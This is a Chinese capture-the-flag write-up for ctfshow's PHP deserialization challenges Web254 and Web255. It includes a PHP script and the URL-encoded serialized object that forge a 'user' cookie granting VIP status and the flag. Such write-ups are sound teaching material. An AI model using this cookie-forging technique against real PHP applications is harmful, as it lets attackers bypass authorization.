ctfshow 反序列化Web254-255

2022/4/17

反序列化

反序列化漏洞的产生主要有以下两个原因:

1. unserialize 函数的参数可控。
2.存在魔法函数。

魔法函数

__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其魔法函数的功能。

Web254

ctfshow 反序列化Web254-255_第1张图片

Playload:

?username=xxxxxx&password=xxxxxx

 ctfshow 反序列化Web254-255_第2张图片

ctfshow 反序列化Web254-255_第3张图片

Web255

ctfshow 反序列化Web254-255_第4张图片

写一个php文件输出user序列化后的cookie

ctfshow 反序列化Web254-255_第5张图片

把题目粘贴到php文件把$isVip的值设置为ture

class ctfShowUser{

    public $username='xxxxxx';

    public $password='xxxxxx';

    public $isVip=ture;



    public function checkVip(){

        return $this->isVip;

    }

    public function login($u,$p){

        return $this->username===$u&&$this->password===$p;

    }

    public function vipOneKeyGetFlag(){

        if($this->isVip){

            global $flag;

            echo "your flag is ".$flag;

        }else{

            echo "no vip, no flag";

        }

    }

}



echo urlencode (serialize (new ctfShowUser()));

//ctfshow反序列化漏洞web255

?>

 访问发现:

ctfshow 反序列化Web254-255_第6张图片

 O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bs%3A4%3A%22ture%22%3B%7D

把这个值填入名为user的cookie

ctfshow 反序列化Web254-255_第7张图片

再把xxxxxx传入username和password

ctfshow 反序列化Web254-255_第8张图片

ctfshow 反序列化Web254-255_第9张图片

执行得到flag:

ctfshow{c0736abc-d51d-4ea5-8e88-c655dbfe5dea}

你可能感兴趣的:(web安全)